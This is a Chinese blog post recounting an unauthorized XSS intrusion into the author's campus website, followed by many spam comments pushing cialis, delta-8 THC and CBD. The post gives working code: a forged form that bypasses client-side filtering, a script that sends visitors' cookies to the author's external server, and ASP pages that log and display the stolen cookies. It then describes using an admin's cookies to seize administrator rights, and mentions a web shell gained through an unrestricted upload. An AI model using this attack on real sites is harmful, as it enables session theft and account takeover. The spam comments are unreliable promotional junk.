XSS入侵校园网
下面介绍一下XSS跨站脚本入侵方式..这种攻击方式其实很流行,但并不是靠工具能实现的,所以一直没有”大众化”.网上很多关于跨站的文章,但大多数只是弹出一个”XSS”.这其实没有什么意义.这就相当于运行程序时弹出一个内存错误的对话框,但你是否意识到你发现了一个缢出漏洞呢?
下面拿我所在学校的一个校园网详细讲解一下攻击入侵过程.
首先,网站使用的在线编辑器是FCKEDITOR,在提交新闻时,如果里面包含SCRIPT标签,会被过滤..但过滤是在客户端过滤的,经测试,网站没有禁止从外部提交数据.这样,我们在本地构造一个表单,看看是否能提交<script>标签.
<form action=”//42.neusoft.edu.cn/www/publish/PubNews.do.x” method=”post” name=”theForm” onSubmit=”return validator()”>
<table width=”100%” border=”0″ cellspacing=”0″ align=”left”>
<tr>
<td width=”70%” valign=”top” id=”context”>
<div id=”pbar”>
<img src=”images/ico.gif” />
发布到分类:
<select name=”cid” id=”cid” onchange=”Access.hasClassRight(‘TopicStyle’,this.value,accesscallback)”>
<option value=”0″>
请选择文章分类
</option>
<option value=”5″ >
体育
…….
<option value=”193″ >
软件
</select>
</div>
<div class=”anews”>
<div class=”title”>
<strong style=”float:left”>文章标题:<textarea name=”title” type=”text” id=”title” size=”40″ msg=”请输入新闻标题”></textarea>
</strong>
<div style=”float:left;display:none” id=”topicstyle”>
</div>
<div>
<div><textarea type=”” id=”text” name=”text” value=”dd”></textarea><input type=”” id=”text___Config” value=””></div>
</div>
<input type=”submit” name=”Submit” value=”确认提交” />
<input type=”reset” name=”Submit2″ value=”重新填写” />
</div>
经测试,<script>能提交上去,这样我们就可以做很多事情了.比如挂木马,放窗口炸弹等..我们要做的事是取COOKIES.
现在的网站一般都是通过COOKIES进行用户验证的,如果我们得到了管理员的COOKIES,自然也享受管理员的权限.
校园网的COOKIES结构是这样的:
userName=*******; password=****************; JSESSIONID=E978968BF9E6008FE48EC8B2AEEBD92C
其中userName是用户ID,password是32位MD5加密的密码…
我们用两个简单的ASP和一小段JS完成操作.
<script language=”javascript”>function getURL(s) {var image = new Image();image.style.width = 0;image.style.height = 0;image.src = s;}getURL(“//www.tianyus.com/42/js.asp?coo=”+encodeURIComponent(document.cookie));</script>
代码相当于取用户的COOKIES,然后以GET方式发送到 //www.tianyus.com/42/js.asp
下面发表一篇文章,插入我们的代码:
下面编辑js.asp,将得到的COOKIES写进数据库
<%
Dim cn
Set cn = Server.CreateObject(“ADODB.Connection”)
cn.Open “DRIVER={Microsoft Access Driver (*.mdb)};” & _
“DBQ=”&Server.MapPath(“js.mdb”)
coo=request.QueryString(“coo”)
cn.execute(“insert into [coo](cookies) values(‘”&coo&”‘)”)
cn.close
set cn=nothing
%>
为了方便我们建立一个see.asp显示得到的COOKIES
<%
Dim cn
Set cn = Server.CreateObject(“ADODB.Connection”)
cn.Open “DRIVER={Microsoft Access Driver (*.mdb)};” & _
“DBQ=”&Server.MapPath(“js.mdb”)
%>
<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “//www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”>
<html xmlns=”//www.w3.org/1999/xhtml”>
<head>
<meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ />
<title>无标题文档</title>
</head>
<body>
<table width=”760″ border=”1″ cellspacing=”4″>
<%
set rs=server.CreateObject(“adodb.recordset”)
rs.open “select * from [coo]”,cn,1
do while not rs.eof
%>
<tr>
<td><%=rs(0)%></td>
<td><%=rs(1)%></td>
</tr>
<%
rs.movenext
loop
%>
<%
rs.close
set rs=nothing
cn.close
set cn=nothing
%>
</table>
</body>
</html>
做完了这些,我就去睡觉了..第二天快中午才起来,看到我这里躺着N个人的COOKIES…
筛选出管理员的COOKIES,然后用他们的COOKIES登陆网站,把自己的帐号加到了管理员组,再新建个”网络高手”用户组耍了一下.之后我就去考试了..晚上回来,N个人要加我QQ.
某人跟我聊了一会,答应他以后发现什么漏洞及时告诉他..
没想到第二天就发现了一个比上面还严重的漏洞,上传头像的地方可以上传任何JSP文件..这下倒好,直接拿到WEB SHELL了..
I believe this is among the so much important information for
me. And i’m satisfied reading your article.
However wanna commentary on some basic things, The site style is perfect,
the articles is truly great : D. Excellent activity, cheers 2CSYEon cheap flights
Appreciate this post. Let me try it out.
2CSYEon cheap flights
Hello There. I found your blog using msn. This is a very well written article.
I will make sure to bookmark it and come back to read more
of your useful info. Thanks for the post.
I’ll certainly comeback.
Great post. I was checking continuously this blog and I am impressed!
Very helpful information specifically the ultimate section 🙂 I deal with such info a lot.
I was seeking this certain information for a very long time.
Thanks and best of luck.
Hello! This is my first visit to your blog! We are a group of volunteers and starting a new initiative in a community in the same niche.
Your blog provided us useful information to work on. You have done a extraordinary job!
Hey there! This is my first comment here so I just wanted to give a
quick shout out and tell you I genuinely enjoy reading through your articles.
Can you suggest any other blogs/websites/forums that deal with
the same subjects? Thanks a ton!
Order cialis buy cialis online buy viagra
Greetings! I’ve been reading your website for a while now and
finally got the bravery to go ahead and give you a shout out from Houston Texas!
Just wanted to say keep up the great work!
You should take part in a contest for one of the finest blogs on the web.
I will highly recommend this web site!
I’m no longer sure the place you’re getting your
info, but good topic. I must spend some time finding out
much more or figuring out more. Thank you for magnificent info I was in search
of this information for my mission.
It’s going to be end of mine day, however before end
I am reading this fantastic post to increase my know-how.
Hello to all, it’s really a pleasant for me to visit this website, it consists of useful Information.
It’s going to be ending of mine day, however before finish I am reading this enormous
article to improve my know-how.
Hey would you mind letting me know which web host you’re using?
I’ve loaded your blog in 3 completely different internet browsers and
I must say this blog loads a lot faster then most.
Can you recommend a good internet hosting provider at a fair price?
Kudos, I appreciate it!
Heya i am for the primary time here. I found this board and I find It truly useful & it
helped me out a lot. I’m hoping to provide something back
and help others like you helped me.
Area 52 Delta 8 THC – Area 52 Delta 8 THC
Area 52 Delta 8 THC – Area 52 Delta 8 THC
delta 8 THC for sale area 52 – delta 8 area 52
area 52 delta 8 THC products – delta 8 THC area 52
Area 52 Delta 8 THC – delta 8 carts Area 52
Very good article. I definitely love this website. Keep writing!
delta 8 THC area 52 – delta 8 THC area 52
delta 8 THC area 52 – Area 52 delta 8 carts
delta 8 THC area 52 – delta 8 THC area 52
delta 8 carts Area 52 – area 52 delta 8 THC products
area 52 delta 8 THC products – delta 8 carts Area 52
you’re in reality a excellent webmaster.
The web site loading speed is incredible. It seems that you are doing any
distinctive trick. Furthermore, The contents are masterpiece.
you have done a excellent job in this matter!
buy delta 8 THC area 52 – buy delta 8 THC area 52
buy delta 8 THC area 52 – delta 8 THC for sale area 52
delta 8 area 52 – Area 52 Delta 8 THC
delta 8 THC area 52 – delta 8 THC area 52
delta 8 carts Area 52 – delta 8 THC for sale area 52
If some one wants to be updated with hottest technologies therefore he must be go to
see this web site and be up to date everyday.
P.S. If you have a minute, would love your feedback on my new website
re-design. You can find it by searching for «royal cbd»
— no sweat if you can’t.
Keep up the good work!
Excellent post. Keep posting such kind of information on your blog.
Im really impressed by your site.
Hi there, You have performed a great job.
I’ll certainly digg it and individually suggest to my friends.
I am confident they’ll be benefited from this site.
P.S. If you have a minute, would love your feedback on my new website
re-design. You can find it by searching for «royal cbd» — no sweat if you can’t.
Keep up the good work!
Hey! I understand this is kind of off-topic but I had to ask.
Does building a well-established website like yours take a lot of work?
I’m completely new to operating a blog but I do write in my diary
everyday. I’d like to start a blog so I will be able to share my personal experience and
thoughts online. Please let me know if you have any suggestions or tips for brand new aspiring bloggers.
Thankyou!
area 52 delta 8 THC products – area 52 delta 8 THC products
area 52 delta 8 THC products – delta 8 THC area 52
delta 8 area 52 – delta 8 THC area 52
Area 52 Delta 8 THC – delta 8 THC for sale area 52
delta 8 THC area 52 – Area 52 Delta 8 THC
This post is genuinely a fastidious one it helps new net users, who are wishing in favor of blogging.
Keep on writing, great job!